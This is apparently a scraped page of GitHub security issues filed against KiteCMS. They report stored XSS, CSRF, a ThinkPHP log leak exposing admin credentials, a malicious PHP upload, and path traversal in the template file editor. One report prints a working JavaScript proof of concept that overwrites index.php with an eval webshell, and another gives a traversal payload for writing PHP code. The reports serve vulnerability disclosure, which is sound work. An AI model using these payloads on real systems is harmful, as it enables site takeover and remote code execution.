kitesky / kitecms Goto Github PK

未定义数组索引: SERVER_ADDR

index.php/admin/index/index.html
$data['SERVER_ADDR'] = $_SERVER['SERVER_ADDR'] ? $_SERVER['SERVER_ADDR'] : $_SERVER['LOCAL_ADDR'];

php版本:php-7.3.11-Win32-VC15-x64
web服务器是caddy1.x

详情：https://mp.weixin.qq.com/s/ETm92MHTNksURjOPNqFgHg

Hello，
Through the audit of the source code, I found that the combination of XSS vulnerability + CSRF vulnerability can be used to get the shell.
First, we use the storage XSS vulnerability in the front-end commentary or the XSS vulnerability in the front-end member registry to send a src attribute of the <script> tag to reference a JS POC from the attacker's server. Here we are testing, we put the JS POC on the current server.
LOOK～
We can modify any file on the server, here we modify index.php
Here is the source code of the index.php file before the modification.

now，we just do it
We insert a reference to xss in the comments section

POC.js:

var xhr = new XMLHttpRequest(); xhr.open("POST", "/admin/template/fileedit.html", false); var data; data = "path=Li9pbmRleC5waHA=&html=%3C%3Fphp%0D%0A%2F%2F+%2B----------------------------------------------------------------------%0D%0A%2F%2F+%7C+ThinkPHP+%5B+WE+CAN+DO+IT+JUST+THINK+%5D%0D%0A%2F%2F+%2B----------------------------------------------------------------------%0D%0A%2F%2F+%7C+Copyright+(c)+2006-2018+http%3A%2F%2Fthinkphp.cn+All+rights+reserved.%0D%0A%2F%2F+%2B----------------------------------------------------------------------%0D%0A%2F%2F+%7C+Licensed+(+http%3A%2F%2Fwww.apache.org%2Flicenses%2FLICENSE-2.0+)%0D%0A%2F%2F+%2B----------------------------------------------------------------------%0D%0A%2F%2F+%7C+Author%3A+liu21st+%3Cliu21st%40gmail.com%3E%0D%0A%2F%2F+%2B----------------------------------------------------------------------%0D%0A%0D%0A%2F%2F+%5B+%E5%BA%94%E7%94%A8%E5%85%A5%E5%8F%A3%E6%96%87%E4%BB%B6+%5D%0D%0Anamespace+think%3B%0D%0A%0D%0A%2F%2F+%E5%8A%A0%E8%BD%BD%E5%9F%BA%E7%A1%80%E6%96%87%E4%BB%B6%0D%0Arequire+__DIR__+.+'%2Fthinkphp%2Fbase.php'%3B%0D%0A%0D%0A%2F%2F+%E6%94%AF%E6%8C%81%E4%BA%8B%E5%85%88%E4%BD%BF%E7%94%A8%E9%9D%99%E6%80%81%E6%96%B9%E6%B3%95%E8%AE%BE%E7%BD%AERequest%E5%AF%B9%E8%B1%A1%E5%92%8CConfig%E5%AF%B9%E8%B1%A1%0D%0A%0D%0A%2F%2F+%E6%89%A7%E8%A1%8C%E5%BA%94%E7%94%A8%E5%B9%B6%E5%93%8D%E5%BA%94%0D%0AContainer%3A%3Aget('app')-%3Erun()-%3Esend()%3B%0D%0Aphpinfo()%3B%0D%0A%40eval(%24_POST%5B1%5D)%3B"; xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest"); xhr.send(data);
When we send the poc, it will trigger the poc after the administrator logs in to the background.

Thank you～

Hello, after testing, I found that KiteCMS v1.1 has a vulnerability -- ThinkPHP log information leak.
Anyone can read ThinkPHP's Log through the URL. Such logs contain the administrator's user name, password, operation behavior, system information, etc. Sensitive information brings greater security risks to the system.

URL: http://domain(or IP)/runtime/log/202107/10.log

For example:
http://test.19981.com/runtime/log/202107/10.log
http://test.19981.com/runtime/log/202107/03.log

1. Log in to the website backend

   url:/index.php/admin/passport/login.html

2. Add php file extension

   System -> site config -> upload ->image extension

   

3. Upload malicious scripts through the upload interface

   

   Use burp to bypass js detection

4. Get the path of the uploaded file

   

5. Get shell

   

Code audit

/application/admin/controller/Upload.php uploadFile()

public function uploadFile()
{
// 获取表单上传文件
$file = Request::file('file');

$uploadObj = new UploadFile($this->site_id);
$ret = $uploadObj->upload($file, 'image');

if ($ret) {
return $this->response(200, '上传成功', $ret);
} else {
return $this->response(201, $uploadObj->getError());
}
}

follow up function :upload()

/application/common/model/UploadFile.php

According to the 16th line of Upload.php, the second parameter of the upload function is image

public function upload($file, $fileType = 'image')
{
// 验证文件类型及大小
switch ($fileType)
{
case 'image':
$result = $file->check(['ext' => $this->config['upload_image_ext'], 'size' => $this->config['upload_image_size']*1024]);
if(empty($result)){
// 上传失败获取错误信息
$this->error = $file->getError();
return false;
}
break;
.....

follow up function: check()

thinkphp/library/think/File.php

$rule has been modified to: {ext=> "jpg,png,gif,php", size=>2097152}

public function check($rule = [])
{
$rule = $rule ?: $this->validate;

if ((isset($rule['size']) && !$this->checkSize($rule['size']))
|| (isset($rule['type']) && !$this->checkMime($rule['type']))
|| (isset($rule['ext']) && !$this->checkExt($rule['ext']))
|| !$this->checkImg()) {
return false;
}

return true;
}

File size will not exceed the maximum，php in the whitelist of file extensions，$rule['type'] is not set，then follow the function：checkImg()

public function checkImg()
    {
        $extension = strtolower(pathinfo($this->getInfo('name'), PATHINFO_EXTENSION));

        /* 对图像文件进行严格检测 */
        if (in_array($extension, ['gif', 'jpg', 'jpeg', 'bmp', 'png', 'swf']) && !in_array($this->getImageType($this->filename), [1, 2, 3, 4, 6, 13])) {
            $this->error = 'illegal image files';
            return false;
        }

        return true;
    }

The value of variable $extension is php,so the first half of the conditional statement is false.

The function named checkImg returns true,and function check() return true.

1. log into the background of the site
   url: /index.php/admin/passport/login.html
2. Add vulnerability URL
   url: /index.php/admin/Template/fileedit
   Convert to a POST request
   
   let contract
   
3. Access index.php generated in the root directory
   url: /index.php?a=whoami
   

Code audit

The vulnerability file is located at: /application/admin/controller/Template.php -> fileedit()

$path and $html We controlled,$rootpath Path splicing
And the PATH variable can be passed through .. / directory
The variable HTML is written to our PHP code
The HTML is decoded, but it has no effect on the PHP code
So we can find an existing file to overwrite the writing.
POST payload is:
path=../../index.php&html=(you php code)
Finally, the command is executed at index.PHP

Hello author, I am honored to be able to use your cms, but when I use it, I found that there are more loopholes after testing, I hope to draw your attention, thank you.
Here are some storage xss vulnerabilities, as follows:
A front-end comment can get a storage xss vulnerability to the background administrator to cookie information：



When the front-end user registers, the xss vulnerability can be used for administrator cookie acquisition and other operations, causing the administrator cookie to leak, causing the attacker to enter the background.



The first and the second:

The results are as follows:





The third and the fourth：



The fifth and the sixth：



and use the same POC，you will find more：



and so on.
There are too many xss vulnerabilities.
There are serious dangerous features in the background configuration. I don't know if this is a loophole. However, it is recommended to disable this function. Once you pass the comments xss in the foreground or the xss vulnerability in the registered user, you can get the administrator's cookie and enter the background. Causes getshell, the server falls.

SCRF : add administrator user
Edit Upload options
Upload php file getshell
CSRF POC:

Edit Upload options

Upload php file getshell